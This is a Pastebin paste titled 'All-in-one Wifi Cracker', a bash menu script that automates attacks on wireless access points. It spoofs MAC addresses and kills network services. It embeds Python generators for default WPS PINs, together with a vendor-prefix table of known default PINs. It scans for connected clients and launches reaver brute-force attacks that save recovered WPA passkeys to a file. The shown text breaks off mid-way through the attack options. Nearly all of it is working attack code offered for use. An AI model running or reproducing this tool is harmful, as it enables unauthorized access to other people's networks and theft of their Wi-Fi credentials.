SHARE
TWEET

All-in-one Wifi Cracker

a guest Jan 6th, 2015 3,021 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3.  
  4.  
  5. RED=$(tput setaf 1 && tput bold)
  6. GREEN=$(tput setaf 2 && tput bold)
  7. STAND=$(tput sgr0)
  8. BLUE=$(tput setaf 6 && tput bold)
  9.  
  10. while :
  11. do
  12.  
  13. ###### Create scrypta storage folder if it doeasn't exist ######
  14.  
  15. if [ -d $HOME/scrypta ];
  16. then
  17.    echo ""
  18. else
  19.    mkdir $HOME/scrypta
  20.    mkdir $HOME/scrypta/temp
  21.    mkdir $HOME/scrypta/Captured_Handshakes
  22.    mkdir $HOME/scrypta/Client_Scans
  23. fi
  24.  
  25. ###### Delete Missed Files In The Temp Directory ######
  26.  
  27.    rm $HOME/scrypta/temp/*.txt &> /dev/null
  28.    rm $HOME/scrypta/temp/*.py &> /dev/null
  29.    rm $HOME/scrypta/temp/*.ivs &> /dev/null
  30.    rm $HOME/scrypta/temp/*.cap &> /dev/null
  31.    rm $HOME/scrypta/temp/*.xor &> /dev/null
  32.    rm $HOME/scrypta/temp/*.csv &> /dev/null
  33.    rm $HOME/scrypta/temp/*.netxml &> /dev/null
  34.    rm $HOME/scrypta/temp/arp-packet &> /dev/null
  35.    rm $HOME/scrypta/temp/*.sh &> /dev/null
  36.  
  37. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  38.  
  39. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  40.  
  41. if [ -s $mon0mac ]
  42. then
  43.    MonitorModeStatus=$(echo Networking Mode Enabled)
  44. else
  45.    MonitorModeStatus=$(echo Attack Mode Enabled)
  46. fi
  47.  
  48. ###### System Environment Options Menu ######
  49. clear
  50. echo $RED"#########################################"
  51. echo "#   $STAND          scrypta             $RED#"
  52. echo "#########################################"
  53. echo "#                                       #"
  54. echo "#$GREEN [1]$BLUE WiFi Adapter Selection            $RED#"
  55. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode  $RED#"
  56. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  57. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake        $RED#"
  58. echo "#$GREEN [5]$BLUE WEP Attacks                       $RED#"
  59. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files        $RED#"
  60. echo "#$GREEN [7]$BLUE Show Recovered Passkeys           $RED#"
  61. echo "#$GREEN [8]$BLUE Recovered Passkey Checker         $RED#"
  62. echo "#                                       #"
  63. echo "#########################################"
  64. echo ""
  65. echo "Chosen Interface$STAND: $wlanX"
  66. echo $RED"System Mode$STAND: $MonitorModeStatus"
  67. echo $RED"MAC address for mon0$STAND: $mon0mac"
  68. echo ""
  69. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  70. echo
  71. case $ChosenOption in
  72.  
  73. 1)
  74. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  75.  
  76. cd $HOME/scrypta/temp
  77. clear
  78. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1  -s ": ")
  79. clear
  80. echo $RED"Available WiFi Adapters.$STAND"
  81. echo ""
  82. echo "$Presented_WiFi_Adapters"
  83. echo ""
  84. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  85. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  86. echo ""
  87. echo ""
  88. echo $RED"You've chosen:$STAND $wlanX"
  89. sleep 1
  90. cd
  91.  
  92. ;;
  93.  
  94. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  95.  
  96. 2)
  97. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
  98.  
  99. clear
  100. echo $RED"#########################################"
  101. echo "#                                       #"
  102. echo "# $GREEN[1]$BLUE Enable Networking Mode           $RED #"
  103. echo "# $GREEN[2]$BLUE Enable Attack Mode               $RED #"
  104. echo "# $GREEN[0]$BLUE Return To Main Menu              $RED #"
  105. echo "#                                       #"
  106. echo "#########################################$STAND"
  107. echo ""
  108. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
  109. if [[ $option == "1" ]]; then
  110.    clear
  111.    echo $RED"Putting the system into networking mode$STAND"
  112.    airmon-ng stop mon5 > /dev/null
  113.    airmon-ng stop mon4 > /dev/null
  114.    airmon-ng stop mon3 > /dev/null
  115.    airmon-ng stop mon2 > /dev/null
  116.    airmon-ng stop mon1 > /dev/null
  117.    airmon-ng stop mon0 > /dev/null
  118.    airmon-ng stop wlanX
  119.    echo $RED"Please wait...$STAND"
  120.    ifconfig $wlanX down
  121.    ifconfig $wlanX down
  122.    wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  123.    ifconfig $wlanX hw ether $wlanFakeMAC
  124.    ifconfig $wlanX up
  125.    sleep 1
  126.    service network-manager start
  127.    echo ""
  128.    echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
  129.    sleep 3
  130.    fi
  131.  
  132. if [[ $option == "2" ]]; then
  133.    clear
  134.    echo $RED"Putting the system into attack mode$STAND"
  135.    echo $RED"Please wait...$STAND"
  136.    echo ""
  137.    airmon-ng stop mon5 > /dev/null
  138.    airmon-ng stop mon4 > /dev/null
  139.    airmon-ng stop mon3 > /dev/null
  140.    airmon-ng stop mon2 > /dev/null
  141.    airmon-ng stop mon1 > /dev/null
  142.    airmon-ng stop mon0 > /dev/null
  143.    ifconfig $wlanX down
  144.  
  145. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
  146. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
  147.    echo ""
  148.    echo $RED"Please wait...$STAND"
  149.    kill `pidof NetworkManager`
  150.    sleep 2
  151.    kill `pidof wpa_supplicant`
  152.    sleep 2                
  153. fi
  154.  
  155.    ifconfig $wlanX up
  156.    sleep 1
  157.    airmon-ng start $wlanX
  158.    echo $RED"Please wait...$STAND"
  159.    sleep 1
  160.    ifconfig $wlanX down
  161.    sleep 1
  162.    ifconfig mon0 down
  163.    wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  164.    ifconfig $wlanX hw ether $wlanMAC1
  165.    echo ""
  166.    sleep 1
  167.    macchanger --mac $wlanMAC1 mon0 > /dev/null
  168.    ifconfig $wlanX up
  169.    ifconfig mon0 up
  170.    echo ""
  171.    echo $RED"MAC address for $wlanX:$STAND"
  172.    macchanger -s $wlanX
  173.    echo ""
  174.    echo $RED"MAC address for mon0:$STAND"
  175.    macchanger -s mon0
  176.    echo ""
  177.    echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
  178.    echo ""
  179.    echo $RED"Attack Mode Should Now Be Enabled.$STAND"
  180.    sleep 3
  181. fi
  182.  
  183. ;;
  184.  
  185. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  186.  
  187. 3)
  188. ###### [3] Attack A WPS Enabled Access Point ######
  189. cd $HOME/scrypta/temp
  190. clear
  191. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  192.  
  193. ############## WPSpin.py ##############
  194. echo '
  195. import sys
  196.  
  197. VERSION    = 1
  198. SUBVERSION = 0
  199.  
  200. def usage():
  201.     print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  202.     print "[*] Usage : python WPSpin.py 123456"
  203.     sys.exit(0)
  204.  
  205. def wps_pin_checksum(pin):
  206.     accum = 0
  207.  
  208.     while(pin):
  209.         accum += 3 * (pin % 10)
  210.         pin /= 10
  211.         accum += pin % 10
  212.         pin /= 10
  213.     return  (10 - accum % 10) % 10
  214.  
  215. try:
  216.     if (len(sys.argv[1]) == 6):
  217.         p = int(sys.argv[1] , 16) % 10000000
  218.         print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  219.     else:
  220.         usage()
  221. except Exception:
  222.     usage()
  223. ' > WPSpin.py
  224.  
  225. ############## easybox_wps.py ##############
  226.  
  227. echo '#!/usr/bin/env python
  228. import sys, re
  229.  
  230. def gen_pin (mac_str, sn):
  231.     mac_int = [int(x, 16) for x in mac_str]
  232.     sn_int = [0]*5+[int(x) for x in sn[5:]]
  233.     hpin = [0] * 7
  234.    
  235.     k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  236.     k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  237.     hpin[0] = k1 ^ sn_int[9];
  238.     hpin[1] = k1 ^ sn_int[8];
  239.     hpin[2] = k2 ^ mac_int[9];
  240.     hpin[3] = k2 ^ mac_int[10];
  241.     hpin[4] = mac_int[10] ^ sn_int[9];
  242.     hpin[5] = mac_int[11] ^ sn_int[8];
  243.     hpin[6] = k1 ^ sn_int[7];
  244.     pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  245.  
  246.     # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  247.         # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc    
  248.     accum = 0
  249.     t = pin
  250.     while (t):
  251.         accum += 3 * (t % 10)
  252.         t /= 10
  253.         accum += t % 10
  254.         t /= 10
  255.     return "%i%i" % (pin, (10 - accum % 10) % 10)
  256.  
  257. def main():
  258.     if len(sys.argv) != 2:
  259.         sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  260.        
  261.     mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  262.     if len(mac_str) != 12:
  263.         sys.exit("check MAC format!\n")
  264.        
  265.     sn = "R----%05i" % int(mac_str[8:12], 16)
  266.     print "derived serial number:", sn
  267.     print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])        
  268.     print "WPS pin:", gen_pin(mac_str, sn)
  269.  
  270. if __name__ == "__main__":
  271.     main()
  272. ' > easybox_wps.py
  273.  
  274. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  275.  
  276. ############## Start Of Target Selection And Pin Generation ##############
  277.  
  278. clear
  279. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  280. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  281. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  282. sed -i ''1,6d';'$d'' WashScan.txt
  283.  
  284. ############## Start Of Loop Section ##############
  285.  
  286. while true
  287. do
  288.  
  289. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1  -s ': ' | sed '$d')
  290. clear
  291. echo $RED"Available Access Points."$STAND
  292. echo ""
  293. echo "$Presented_APs"
  294. echo ""
  295. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  296.  
  297. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  298. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  299. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  300. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  301. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  302. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  303. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  304. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  305. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  306.  
  307. ############## End Of Target Selection And Pin Generation ##############
  308.  
  309. ############## Start Of Choose A MAC Address Options ##############
  310.  
  311. clear
  312. echo $RED"Please choose a MAC address option:$STAND"
  313. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  314. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  315. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  316. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  317.  
  318. if [[ $option == "1" ]]; then
  319.    clear
  320.    echo $RED"Auto Setting A Random MAC Address.$STAND"
  321.    echo $RED"Please wait..."$STAND
  322.    ifconfig $wlanX down
  323.    ifconfig $wlanX down
  324.    sleep 1
  325.    ifconfig mon0 down
  326.    wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  327.    ifconfig $wlanX hw ether $wlanMAC2
  328.    echo ""
  329.    sleep 1
  330.    macchanger --mac $wlanMAC2 mon0
  331.    ifconfig $wlanX up
  332.    ifconfig mon0 up
  333.    echo ""
  334.    echo $RED"MAC address for$STAND $wlanX:"
  335.    macchanger -s $wlanX
  336.    echo ""
  337.    echo $RED"MAC address for$STAND mon0:"
  338.    macchanger -s mon0
  339.    echo ""
  340.    echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  341.    echo ""
  342.    sleep 4
  343.    fi
  344.  
  345. if [[ $option == "2" ]]; then
  346.    clear
  347.    echo $RED"Set A User specified MAC Address.$STAND"
  348.    echo $RED"Please wait..."$STAND
  349.    ifconfig $wlanX down
  350.    ifconfig mon0 down
  351.    echo ""
  352.    echo $RED"Setting a random MAC address."$STAND
  353.    macchanger -r $wlanX
  354.    echo ""
  355.    read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  356.    ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  357.    macchanger --mac $SpecifiedInterfaceMAC mon0
  358.    ifconfig $wlanX up
  359.    ifconfig mon0 up
  360.    echo ""
  361.    echo $RED"MAC address for$STAND $wlanX:"$STAND
  362.    macchanger -s $wlanX
  363.    echo ""
  364.    echo $RED"MAC address for$STAND mon0:"$STAND
  365.    macchanger -s mon0
  366.    echo ""
  367.    sleep 2
  368.    echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  369.    echo ""
  370.    echo $RED"Attack Mode Should Now Be Enabled."$STAND
  371.    sleep 2
  372.    fi
  373.  
  374. if [[ $option == "3" ]]; then
  375.    echo ""
  376. fi
  377.  
  378. ############## End Of Choose A MAC Address Options ##############
  379.  
  380. ############## Start Of Review Information ##############
  381.  
  382. clear
  383. echo $RED"Review Information."$STAND
  384. echo ""
  385. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  386. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  387. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  388. echo ""
  389. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  390. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  391. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
  392. ############## Start Of WPSPIN-1.3 Default Pin Generater ##############
  393.  
  394. ESSID=$(echo $AP_essid)
  395. BSSID=$(echo $AP_bssid)
  396.  
  397. FUNC_CHECKSUM(){
  398. ACCUM=0
  399.  
  400. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
  401. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  402. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  403. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  404. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  405. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  406. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
  407.  
  408. DIGIT=`expr $ACCUM '%' 10`
  409. CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
  410.  
  411. PIN=`expr $PIN '+' $CHECKSUM`
  412. ACCUM=0
  413.  
  414. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
  415. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  416. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  417. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  418. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  419. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  420. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
  421. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
  422.  
  423. RESTE=`expr $ACCUM '%' 10`
  424.  }
  425.  
  426. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  427.  
  428. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  429.  
  430. MAC=$(echo $FINBSSID | tr -d ':')
  431.  
  432. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  433.  
  434. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  435.  
  436. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  437.  
  438. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  439.  
  440. MACESSID=$(echo $PAREMAC$FINESSID)
  441.  
  442. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  443.  
  444. PIN=`expr 10 '*' $STRING`
  445.  
  446. FUNC_CHECKSUM
  447.  
  448. PINWPS1=$(printf '%08d\n' $PIN)
  449.  
  450. STRING2=`expr $STRING '+' 8`
  451. PIN=`expr 10 '*' $STRING2`
  452.  
  453. FUNC_CHECKSUM
  454.  
  455. PINWPS2=$(printf '%08d\n' $PIN)
  456.  
  457. STRING3=`expr $STRING '+' 14`
  458. PIN=`expr 10 '*' $STRING3`
  459.  
  460. FUNC_CHECKSUM
  461.  
  462. PINWPS3=$(printf '%08d\n' $PIN)
  463.  
  464. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  465.  
  466. then
  467.  
  468. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  469.  
  470. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  471.  
  472. STRING4=`expr $RAIZ '+' 7`
  473.  
  474. PIN=`expr 10 '*' $STRING4`
  475.  
  476. FUNC_CHECKSUM
  477.  
  478. PINWPS4=$(printf '%08d\n' $PIN)
  479.  
  480. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
  481. PIN4REAVER=$PINWPS4
  482. else
  483. case $CHECKBSSID in
  484. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  485. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
  486. $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
  487. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  488. PIN4REAVER=$PINWPS1
  489. ;;
  490. 001915)
  491. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  492. PIN4REAVER=12345670
  493. ;;
  494. 404A03)
  495. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  496. PIN4REAVER=11866428
  497. ;;
  498. F43E61 | 001FA4)
  499. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  500. PIN4REAVER=12345670
  501. ;;
  502. 001A2B)
  503. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  504. then
  505. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  506. PIN4REAVER=88478760
  507. else
  508. echo -e "PIN POSSIBLE... > $PINWPS1"
  509. PIN4REAVER=$PINWPS1
  510. fi
  511. ;;
  512. 3872C0)
  513. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  514. then
  515. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  516. PIN4REAVER=18836486
  517. else
  518. echo -e "PIN POSSIBLE    > $PINWPS1"
  519. PIN4REAVER=$PINWPS1
  520. fi
  521. ;;
  522. FCF528)
  523. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  524. PIN4REAVER= 20329761
  525. ;;
  526. 3039F2)
  527. echo -e "several possible PINs, ranked in order>  
  528.  16538061 16702738 18355604 88202907 73767053 43297917"
  529. PIN4REAVER=16538061
  530. ;;
  531. A4526F)
  532. echo -e "several possible PINs, ranked in order>  
  533.  16538061 88202907 73767053 16702738 43297917 18355604 "
  534. PIN4REAVER=16538061
  535. ;;
  536. 74888B)
  537. echo -e "several possible PINs, ranked in order>  
  538.  43297917 73767053 88202907 16538061 16702738 18355604"
  539. PIN4REAVER=43297917
  540. ;;
  541. DC0B1A)
  542. echo -e "several possible PINs, ranked in order>  
  543.  16538061 16702738 18355604 88202907 73767053 43297917"
  544. PIN4REAVER=16538061
  545. ;;
  546. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  547. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  548. PIN4REAVER=$PINWPS1
  549. ;;
  550. 002275)
  551. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  552. PIN4REAVER=$PINWPS1
  553. ;;
  554. 08863B)
  555. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  556. PIN4REAVER=$PINWPS1
  557. ;;
  558. 001CDF)
  559. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  560. PIN4REAVER=$PINWPS1
  561. ;;
  562. 00A026)
  563. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  564. PIN4REAVER=$PINWPS1
  565. ;;
  566. 5057F0)
  567. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  568. PIN4REAVER=$PINWPS1
  569. ;;
  570. C83A35 | 00B00C | 081075)
  571. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  572. PIN4REAVER=$PINWPS1
  573. ;;
  574. E47CF9 | 801F02)
  575. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  576. PIN4REAVER=$PINWPS1
  577. ;;
  578. 0022F7)
  579. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  580. PIN4REAVER=$PINWPS1
  581. ;;
  582. *)
  583. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  584. PIN4REAVER=$PINWPS1
  585. ;;
  586. esac
  587. fi
  588.  
  589. ############## End Of WPSPIN-1.3 Default Pin Generater ##############
  590.  
  591. echo ""
  592. echo $RED"MAC address for$STAND mon0:"$STAND
  593. macchanger -s mon0
  594. sleep 4
  595.  
  596. ############## End Of Review Information ##############
  597.  
  598. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  599. echo ""
  600. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  601.  
  602. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  603.    xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  604.    cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  605.    mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  606.    rm temp1.txt
  607.    echo ""
  608.    echo ""
  609.    echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  610.    echo ""
  611.    read -p $GREEN"Press [Enter] to continue.$STAND"
  612.    fi
  613.  
  614. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  615.    echo ""
  616.    fi
  617. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  618.  
  619. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
  620.  
  621. clear
  622. echo $RED"Choose an attack option:"$STAND
  623. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  624. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  625. echo
  626. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  627. echo
  628. case $yourch in
  629.  
  630. 1)
  631. clear
  632. echo $RED"Choose a pin:"
  633. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  634. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  635. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  636. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  637. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  638.  
  639. if [[ $PinOption == "1" ]]; then
  640.    clear
  641.    echo $RED"Reaver Attack Command:"$STAND
  642.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  643.    echo ""
  644.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  645.    clear
  646.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  647.    rm reaver.txt
  648.    echo ""
  649.    fi
  650.  
  651. if [[ $PinOption == "2" ]]; then
  652.    clear
  653.    echo $RED"Reaver Attack Command:"$STAND
  654.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  655.    echo ""
  656.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  657.    clear
  658.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  659.    rm reaver.txt
  660.    echo ""
  661.    fi
  662.  
  663. if [[ $PinOption == "3" ]]; then
  664.    clear
  665.    echo $RED"Reaver Attack Command:"$STAND
  666.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  667.    echo ""
  668.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  669.    clear
  670.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  671.    rm reaver.txt
  672.    echo ""
  673.    fi
